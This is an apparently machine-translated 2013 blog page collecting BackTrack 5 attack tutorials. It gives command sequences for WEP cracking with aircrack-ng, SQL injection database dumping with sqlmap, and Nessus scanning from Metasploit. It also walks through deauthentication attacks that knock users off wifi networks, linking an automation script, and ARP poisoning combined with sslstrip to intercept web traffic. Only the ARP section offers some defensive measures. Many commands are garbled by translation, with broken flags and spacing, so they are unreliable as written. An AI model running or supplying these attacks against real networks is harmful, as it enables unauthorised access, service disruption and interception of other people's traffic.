Saturday, September 14, 2013

WEP Backtrack 5 Keys


WEP Backtrack 5 Keys






airmon-ng start wlan0   > Place monitor mode 

airodump-ng mon0   > Scan NETWORKS quick scan ctrl + c Leaving 

airodump-ng-w-c FILENAME No. CHANNEL - bssid MAC mon0> Capture Packages 

aireplay-ng -1 0-a MAC mon0 

aireplay-ng -3-b MAC mon0 

dir   > View file. CAP 
aircrack-ng NAME ARICHIVO.cap

Backtrack 5 R3 SqlMap


Backtrack 5 R3 sqlmap:

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for maximum penetration tester and a broad range of switches lasting fingerprint database, more data Search the database to access the file system underlying and executing commands on the operating system via out-of-band connections.


Video tutorial:







Some basic options. 

/ Sqlmap.py-u URL - dbs / 
/ Sqlmap.py-or URL-D - table 
/ Sqlmap.py-or URL-D-T-columns 
/ Sqlmap.py-or URL-D-G-C - dump 


-D: Database 
-T: Tables 
-C: Columns 
-U: user custom 

- Table 
- Columns 
- Dump

May Nessus | Tenable Network Security BackTrack 5

May Nessus | Tenable Network Security BackTrack 5 




Nessus: For security professionals that evaluate complex business networks for security breaches and compliance issues, Nessus is vulnerability of the world's most widely deployed and evaluation of product configurations. With over five million downloads to date, Nessus features high-speed discovery, configuration auditing, asset profile, sensitive data discovery, integration of patch management, and vulnerability analysis of your position Safety.Nessus scanners can be distributed throughout the enterprise, in DMZ, and through physically separated networks. 
Nessus is supported by a team of world-renowned research and has the largest base possible knowledge vulnerability, making it suitable for more complex environments. 


Source: http://www.tenable.com/products/nessus 


Video tutorial: http://www.youtube.com/watch?v=HrKoHx7LuZM&feature=plcp 



Basic Commands (Video tutorial) 

root @ bt: ~ # apt-get install nessus 

NESSUS recorded: 

http://www.tenable.com/products/nessus/nessus-download-agreement 

root @ bt: ~ # / opt / nessus / bin / nessus-fetch - register "Registration Code" 

root @ bt: ~ # / opt / nessus / sbin / nessus-adduser 

root @ bt: ~ # msfconsole 

msf> load nessus 

msf> nessus_conect 

msf> -3 nessus_scan_new <NAME> <IP> 

msf> nessus_report_list 

msf> nessus_report_hosts <ID> 

msf> nessus_report_host_ports <IP> <ID> 

msf> <report <protocol> <port> <IP> nessus_report_host_detail id> 



Nessus commands: 

nessus_admin nessus_save 
nessus_connect nessus_scan_new 
nessus_db_scan nessus_scan_pause 
nessus_help nessus_scan_pause_all 
nessus_index nessus_scan_resume 
nessus_logout nessus_scan_resume_all 
nessus_plugin_details nessus_scan_status 
nessus_plugin_family nessus_scan_stop 
nessus_plugin_list nessus_scan_stop_all 
nessus_plugin_prefs nessus_server_feed 
nessus_policy_del nessus_server_prefs 
nessus_policy_list nessus_server_status 
nessus_report_del nessus_template_list 
nessus_report_get nessus_user_add 
nessus_report_host_detail nessus_user_del 
nessus_report_host_ports nessus_user_list 
nessus_report_hosts nessus_user_passwd 
nessus_report_list 

Come see the show just have msf enter the name of the command line example: 


msf> nessus_connect 

[*] Usage: 
[*] Nessus_connect username: password @ hostname: port <ssl ok> 
[*] Example:> nessus_connect msf: msf@192.168.1.10: 8834 ok 
[*] OR 
[*] Nessus_connect username @ hostname: port <ssl ok> 
[*] Example:> nessus_connect msf@192.168.1.10: 8834 ok 
[*] OR 
[*] Nessus_connect hostname: port <ssl ok> 
[*] Example:> 192.168.1.10:8834 nessus_connect ok 
[*] OR 
[*] Nessus_connect 
[*] Example:> nessus_connect 
[*] This only works after You have saved creds with nessus_save 
msf>

DosWifi


In this tutorial I come to bring as knocking over a wireless network by performing a DDoS good for this nececitaremos acer wireless cardthat will help us to audit wireless acer as we used to crack WEP networks, nececitaremos also have the aireplay and especially good use Linux jejejej because here I leave the explanation to be guided on how a DDoS acer manually to a network connection and below I leave a script.sh to make this attack but his explanation automated greetings await your response



1-We put the network card in monitor mode with the command: airmon-ng start wlan0



2-We look at the access point channel and put the channel in monitor mode with the command: airmon-ng mon0-c 5 5 is the channel number and mon0 is the interface.



3-If we knock down entire wireless network deauthentication packets sent by an access point with this command tumbamos the whole wireless network without internet allowing all users connected to it aireplay-ng -0 0-a 00:11:22: 33:44:55 00:11:22:33:44:55 mon0 which would have to be the mac address of the access point and wireless network interface mon0.



4-If you just want to knock down a client connected to the Wifi network deauthentication packets sent to a specific client with this command GROUNDED tumbamos the internet wireless customer leaving aireplay-ng -0 0-a 00:11:22:33:44 : 55-c 55:44:33:22:11:00 00:11:22:33:44:55 mon0 which would have to be the mac address of the access point and wireless network 55:44:33:22 11:00 would be the mac address of the client and interface mon0.




* Here I leave the script to all this automated attack agan ...



DOWNLOAD: 
http://www.mediafire.com/?obog1b70709seec 

Backtrack 5 - ARP Poisoning


ARP Poisoning 


ARP Protocol


ARP is a layer 2 protocol link. ARP protocolwill be responsible for obtaining physical MAC addresses from IP addresses.In this type of network is necessary to know the destination MAC so that only the packet reaches the corresponding network interface and not another.
As noted, the concept of ARP only makes sense if we are in the field of switched networks, otherwise it would not be necessary to know the destination MAC in the network.


ARP Poisoning
The ARP poisoning, also known as ARP Poisoning or ARP Poison Routing is a technique used to infiltrate a LAN.

How does it work?

The principle ARP poisoning is to send fake ARP messages (spoofed) to the Ethernet. Usually the aim is to associate the attacker's MAC address with the IP address of another node (the node attacked), such as the defaultgateway (gateway). Any traffic to the IP address of that node, will be mistakenly sent to the attacker, rather than to its actual destination. The attacker can then choose among forward traffic to the actual default gateway (passive attack or listening), or modify the data before forwarding (active attack). The attacker can even launch an attack DoS (Denial of Service) against a victim by associating a nonexistent MAC address with the IP address of the default gateway of the victim.


Defense methods

  • A method to prevent ARP spoofing is the use of static ARP tables, ie add static ARP entries, so that there is no dynamic cache, each table entry maps a MAC address to its corresponding IP address. However, this is not a practical solution, especially in large networks.
  • In large networks it is preferable to use another method: the DHCP snooping. Using DHCP, the network device keeps track of the MAC addresses that are connected to each port, so that quickly detects if it receives a ARP spoofing. This method is implemented in the network equipment manufacturers such as Cisco, Extreme Networks and Allied Telesis.
  • Arpwatch is a Unix program that listens on the network ARP replies, and sends an email notification to the administrator of the network, when an ARP entry changes.
  • RARP ("Reverse ARP" or reverse ARP) is the protocol used to access, from a MAC address, your IP address. If response to a question, RARP returns more than one IP address, it means that MAC address has been cloned.



Video Tutorial:




Commands Back | Track: 

echo 1> / proc/sys/net/ipv4/ip_forward 
iptables-t nat-A PREROUTING-p tcp - destination-port 80-j REDIRECT - to-port 1000 
sslstrip-p-l 1000 / another window 
tail-f sslstrip.log 
arpspoof-i wlan0-t IP - Door link